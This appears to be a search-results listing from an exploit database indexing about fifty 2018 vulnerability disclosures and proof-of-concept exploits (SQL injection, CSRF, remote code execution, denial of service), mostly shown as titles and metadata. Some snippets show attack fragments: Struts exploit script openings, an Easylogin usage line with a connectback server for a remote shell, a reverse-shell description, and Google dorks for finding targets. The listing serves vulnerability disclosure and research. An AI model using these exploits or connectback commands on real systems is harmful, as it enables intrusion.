41207 matches found
Electron WebPreferences - Remote Code Execution
Electron WebPreferences - Remote Code Execution CVE-2018-15685 - Electron WebPreferences Remote Code Execution This is a minimal Electron application with a POC for CVE-2018-15685. A remote code execution vulnerability has been discovered affecting apps with the ability to open nested child windo...
Seagate Personal Cloud SRN21C 4.3.16.0 4.3.18.0 - SQL Injection
Seagate Personal Cloud SRN21C 4.3.16.0 4.3.18.0 - SQL Injection ------------------------------------------------------------------------ Seagate Media Server multiple SQL injection vulnerabilities ------------------------------------------------------------------------ Yorick Koster, September 20...
CuteFTP 5.0 - Buffer Overflow
CuteFTP 5.0 - Buffer Overflow...
Responsive FileManager 9.13.4 - Directory Traversal
Responsive FileManager 9.13.4 - Directory Traversal The following vulnerabilities were fixed in the version 9.13.4. https://responsivefilemanager.com 1 Path Traversal Allows to Read Any File Reserved CVE: CVE-2018-15535 Discovered By: Simon Uvarov Vendor Status: Fixed Details: The following reque...
Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)
Gleez CMS 1.2.0 - Cross-Site Request Forgery Add Admin Exploit Title: Gleez CMS 1.2.0 - Cross-Site Request Forgery Add Admin Date: 2018-08-24 Exploit Author: GunEggWang Vendor Homepage: https://gleezcms.org/ Software Link: https://github.com/gleez/cms Version: 1.2.0 CVE : CVE-2018-15845...
LiteCart 2.1.2 - Arbitrary File Upload
LiteCart 2.1.2 - Arbitrary File Upload Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload Date: 2018-08-27 Exploit Author: Haboob Team Software Link: https://www.litecart.net/downloading?version=2.1.2 Version: 2.1.2 CVE : CVE-2018-12256 1. Description admin/vqmods.app/vqmods.inc.php in LiteCar...
Adobe Flash - AVC Processing Out-of-Bounds Read
Adobe Flash - AVC Processing Out-of-Bounds Read The attached fuzz file causes an out-of-bounds read in AVC processing. To reproduce the issue, put both attached files on a server, and vist: http://127.0.0.1/LoadMP4.swf?file=transpose.mp4 This issue reproduces on Chrome and Firefox for Linux. Proo...
Libpango 1.40.8 - Denial of Service (PoC)
Libpango 1.40.8 - Denial of Service PoC Exploit Title: Libpango 1.40.8 - Denial of Service PoC Date: 2018-08-06 Exploit Author: Jeffery M Vendor Homepage: https://www.pango.org/ Software Link: http://ftp.gnome.org/pub/GNOME/sources/pango/1.40/pango-1.40.9.tar.xz Version: 1.40.8+ Tested on: Window...
RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)
RICOH MP C4504ex Printer - Cross-Site Request Forgery Add Admin Exploit Title: RICOH MP C4504ex Printer - Cross-Site Request Forgery Add Admin Date: 2018-08-21 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.ricoh.com/ Hardware Link :...
Firefox 55.0.3 - Denial of Service (PoC)
Firefox 55.0.3 - Denial of Service PoC Exploit Title: Firefox 55.0.3 - Denial of Service PoC Date: 2018-08-26 Exploit Author: L0RD Vendor Homepage: mozilla.org Software Link: https://www.mozilla.org/en-US/firefox/55.0.3/releasenotes/ Version: 55.0.3 Tested on: Windows 10 CVE: N/A Description : An...
Sentrifugo HRMS 3.2 - deptid SQL Injection
Sentrifugo HRMS 3.2 - deptid SQL Injection Exploit Title: Sentrifugo HRMS 3.2 - 'deptid' SQL Injection Exploit Author: Javier Olmedo Website: https://hackpuntes.com Date: 2018-08-26 Google Dork: N/A Vendor: http://www.sapplica.com Software Link: http://www.sentrifugo.com/download Affected Version...
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection
WordPress Plugin Plainview Activity Monitor 20161228 - Authenticated Command Injection !-- Wordpress Plainview Activity Monitor RCE + Version: 20161228 and possibly prior + Description: Combine OS Commanding and CSRF to get reverse shell + Author: LydAcric LEFEBVRE + CVE-ID: CVE-2018-15877 +...
WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) template_id SQL Injection
WordPress Plugin Gift Voucher 1.0.5 - Authenticated templateid SQL Injection Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'templateid' SQL Injection Google Dork: intext:"/wp-content/plugins/gift-voucher/" Date: 2018-08-23 Exploit Author: Renos Nikolaou Software Link:...
ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting Exploit Title: ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting Date: 2018-08-21 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.manageengine.com/ Hardware Link : https://www.manageengine.com/products/ad-manager/ Softwa...
Apache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution (1)
Apache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution 1 !/usr/bin/env python3 coding=utf-8 struts-pwn: Apache Struts CVE-2018-11776 Exploit Author: Mazin Ahmed This code uses a payload from: https://github.com/jas502n/St2-057 import argparse import random import requests import sys try: fro...
UltimatePOS 2.5 - Remote Code Execution
UltimatePOS 2.5 - Remote Code Execution Exploit Title: UltimatePOS 2.5 - Remote Code Execution Google Dork: intext:"UltimatePOS" Date: 2018-08-22 Exploit Author: Renos Nikolaou Vendor Homepage: http://ultimatefosters.com/ Software Link:...
Apache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution (2)
Apache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution 2 !/usr/bin/python -- coding: utf-8 -- hook-s3c github.com/hook-s3c, @hooks3c on twitter import sys import urllib import urllib2 import httplib def exploithost,cmd: print "Execute: ".formatcmd ognlpayload = "$" ognlpayload +=...
ManageEngine ADManager Plus 6.5.7 - HTML Injection
ManageEngine ADManager Plus 6.5.7 - HTML Injection Exploit Title: ManageEngine ADManager Plus 6.5.7 - HTML Injection Date: 2018-08-21 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.manageengine.com/ Hardware Link : https://www.manageengine.com/products/ad-manager/ Software : ZOHO Co...
SkypeApp 12.8.487.0 - Cuenta de Skype o Microsoft Denial of Service (PoC)
SkypeApp 12.8.487.0 - Cuenta de Skype o Microsoft Denial of Service PoC Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-08-23 Vendor Homepage: https://www.skype.com/es/home/ Tested Version: 12.8.487.0...
Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)
Vox TG790 ADSL Router - Cross-Site Request Forgery Add Admin Title: Vox TG790 ADSL Router - Cross-Site Request Forgery Add Admin Author: Cakes Exploit Date: 2018-08-01 Vendor: Vox Telecom Link: https://www.vox.co.za/ Firmware Version: 6.2.W.1 CVE: N/A Description Due to improper session managemen...
PCViewer vt1000 - Directory Traversal
PCViewer vt1000 - Directory Traversal Exploit Title: PCViewer vt1000 - Directory Traversal Exploit Author: Berk Dusunur Google Dork: N/A Type: Hardware Date: 2018-07-21 Vendor Homepage: N/A Software Link: http://www.softpedia.com/get/System/File-Management/Pc-Viewer.shtml Affected Version: vt1000...
CuteFTP 8.3.1 - Denial of Service (PoC)
CuteFTP 8.3.1 - Denial of Service PoC Exploit Title : CuteFTP 8.3.1 - Denial Of Service PoC Exploit Author : Ali Alipour WebSite : Alipour.it Date: 2018-08-22 Vendor Homepage : http://www.cuteftp.com/ Software Link Download : https://filehippo.com/downloadcuteftppro/4518/ Tested on : Windows 10 -...
Twitter-Clone 1 - code SQL Injection
Twitter-Clone 1 - code SQL Injection Exploit Title: Twitter-Clone 1 - 'code' SQL Injection Date: 2018-08-22 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 vulnerable files : mailactivation.php , stalkers.php , search.php...
StyleWriter 4 1.0 - Denial of Service (PoC)
StyleWriter 4 1.0 - Denial of Service PoC...
Epiphany Web Browser 3.28.1 - Denial of Service (PoC)
Epiphany Web Browser 3.28.1 - Denial of Service PoC Exploit Title: Epiphany Web Browser 3.28.1 - Denial of Service PoC Author: Dhiraj Mishra Date: 2018-08-23 Software: https://projects-old.gnome.org/epiphany/ Version: 3.28.1 CVE: N/A Tested on: Ubuntu 18 64bit Steps to reproduce: 1. Open epiphany...
UltraISO 9.7.1.3519 - Denial Of Service (PoC)
UltraISO 9.7.1.3519 - Denial Of Service PoC Exploit Title : UltraISO 9.7.1.3519 - Denial Of Service PoC Exploit Author : Ali Alipour WebSite : Alipour.it Date: 2018-08-22 Vendor Homepage : https://www.ultraiso.com Software Link Download : https://www.ultraiso.com/download.html Tested on : Windows...
Easyboot 6.6.0 - Denial Of Service (PoC)
Easyboot 6.6.0 - Denial Of Service PoC Exploit Title: Easyboot 6.6.0 - Denial Of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-22 Homepage: http://www.ezbsystems.com/ Software Link: http://www.ezbsystems.com/easyboot/download.htm Tested Version: 6.6.0 Tested on OS: Windows 7...
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation SystemCollector PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service Affected Products Windows 10 Windows Server Windows Server 2016 Visual Studio 2015 Update 3 Visual Studio 20...
Ghostscript - Multiple Vulnerabilities
Ghostscript - Multiple Vulnerabilities http://seclists.org/oss-sec/2018/q3/142 These are critical and trivial remote code execution bugs in things like ImageMagick, Evince, GIMP, and most other PDF/PS tools. ---- Hello, this was discussed on the distros list, but it was suggested to move discussi...
Softdisk 3.0.3 - Denial Of Service (PoC)
Softdisk 3.0.3 - Denial Of Service PoC Exploit Title: Softdisk 3.0.3 - Denial Of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-22 Homepage: http://www.ezbsystems.com/ Software Link: https://www.ezbsystems.com/softdisc/download.htm Tested Version: 3.0.3 Tested on OS: Windows 7...
Geutebrueck re_porter 16 - Cross-Site Scripting
Geutebrueck reporter 16 - Cross-Site Scripting Exploit Title: Geutebrueck reporter 16 - Cross-Site Scripting Date: 2018-08-03 Exploit Author: Kamil Suska Vendor: https://www.geutebrueck.com/enUS.html Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html Version: prio...
ZyXEL VMG3312-B10B - Cross-Site Scripting
ZyXEL VMG3312-B10B - Cross-Site Scripting Exploit Title: ZyXEL VMG3312-B10B - Cross-Site Scripting Date: 2018-08-21 Exploit Author: Samet ŞAHİN Vendor Homepage: https://www.zyxel.com/ Software Link: ftp://ftp.zyxel.com.tr/ZyXELURUNLERI/MODEMLER/VDSLMODEMLER/VMG3312-B10B/ Version: ZyXEL VMG3312-B1...
KingMedia 4.1 - File Upload
KingMedia 4.1 - File Upload Exploit Title: KingMedia 4.1 - Remote Code Execution Author: Efren Diaz Exploit Date: 2018-08-15 Software: KingMedia Version: 1.x, 2.x, 3.x, 4.1 Link: https://codecanyon.net/item/king-media-video-image-upload-and-share/7877877 CVE: N/A \n\n"; echo " -target:...
Project64 2.3.2 - Buffer Overflow (SEH)
Project64 2.3.2 - Buffer Overflow SEH...
Geutebrueck re_porter 7.8.974.20 - Credential Disclosure
Geutebrueck reporter 7.8.974.20 - Credential Disclosure Exploit Title: Geutebrueck reporter 7.8.974.20 - Credential Disclosure Date: 2018-08-03 Exploit Author: Kamil Suska Vendor: https://www.geutebrueck.com/enUS.html Link:...
Textpad 7.6.4 - Denial Of Service (PoC)
Textpad 7.6.4 - Denial Of Service PoC Exploit Title: Textpad 7.6.4 - Denial Of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-22 Homepage: https://textpad.com Software Link: https://textpad.com/download/v76/win32/txpeng764-32.zip Tested Version: 7.6.4 Tested on OS: Windows 7...
Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection
Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection Exploit Title: Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection Exploit Author: Mostafa Gharzi Website: https://www.certcc.ir Date: 2018-08-19 Google Dork: N/A Vendor: The WP Ninjas Software Link: https://wordpress.org/plugins/ninja-forms/...
OpenSSH 2.3 7.7 - Username Enumeration
OpenSSH 2.3 7.7 - Username Enumeration Exploit: OpenSSH 7.7 - Username Enumeration Author: Justin Gardner Date: 2018-08-20 Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz Affected Versions: OpenSSH version 7.7 CVE: CVE-2018-15473 / \ / / | | | | | | | | | | | || | | ...
Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
Twitter-Clone 1 - Cross-Site Request Forgery Delete Post Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery Delete Post Date: 2018-08-21 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 Description : An issue was...
Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)
Hikvision IP Camera 5.4.0 - User Enumeration Metasploit Exploit title: Hikvision IP Camera 5.4.0 - User Enumeration Metasploit Author: Alfie Date: 2018-08-21 Website: https://www.hikvision.com/en/ Software: Hikvision Camera Versions: DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 16053...
Project64 2.3.2 - Denial Of Service (PoC)
Project64 2.3.2 - Denial Of Service PoC Exploit Title: Project64 2.3.2 - Denial Of Service PoC. Author: Gionathan "John" Reale Discovey Date: 2018-08-21 Homepage: https://www.pj64-emu.com Software Link:https://www.pj64-emu.com/download/project64-latest Tested Version: 2.3.2 Tested on OS: Windows ...
Twitter-Clone 1 - userid SQL Injection
Twitter-Clone 1 - userid SQL Injection Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection Date: 2018-08-21 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 POC : SQLi vulnerable files : follow.php , index.php vulnerable...
Countly - Cross-Site Scripting
Countly - Cross-Site Scripting Exploit Title: Countly-server StoredPersistent XSS Vulnerability Date: Monday - 2018 13 August Author: 10:10AM Team Discovered By: Sleepy Software Link: https://github.com/Countly/countly-server Version: All Version Category: Web-apps Security Risk: Critical Tested...
Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution
Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution !/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.p...
WordPress Plugin Chained Quiz 1.0.8 - answer SQL Injection
WordPress Plugin Chained Quiz 1.0.8 - answer SQL Injection Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection Exploit Author: Çlirim Emini Website: https://www.sentry.co.com Software Link: https://wordpress.org/plugins/chained-quiz/ Version/s: 1.0.8 and below Patched...
Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)
Zortam MP3 Media Studio 23.95 - Denial of Service PoC Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-19 Homepage: https://www.zortam.com Software Link: https://www.zortam.com/download.html Tested Version: 23.95 Tested on...
MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery
MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery Date: 2018-05-17 Author: 0xB9 Twitter: @0xB9Sec Software Link: https://community.mybb.com/mods.php?action=view&pid=1105 Version: 1.1 Tested on: Ubuntu...
SEIG Modbus 3.4 - Denial of Service (PoC)
SEIG Modbus 3.4 - Denial of Service PoC Title: SEIG Modbus 3.4 - Denial of Service PoC Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link:...
Prime95 29.4b7 - Denial Of Service (PoC)
Prime95 29.4b7 - Denial Of Service PoC Exploit Title: Prime95 29.4b7 - Denial Of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-20 Homepage: http://www.mersenne.org Software Link: http://www.mersenne.org/ftproot/gimps/p95v294b7.win32.zip Tested Version: 29.4b7 Tested on OS:...
Restorator 1793 - Denial of Service (PoC)
Restorator 1793 - Denial of Service PoC Exploit Title: Restorator 1793 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-19 Homepage: https://www.bome.com/ Software Link: https://www.bome.com/bome/downloads/Restorator2018Full1793.exe Tested Version: v1793 Tested on OS:...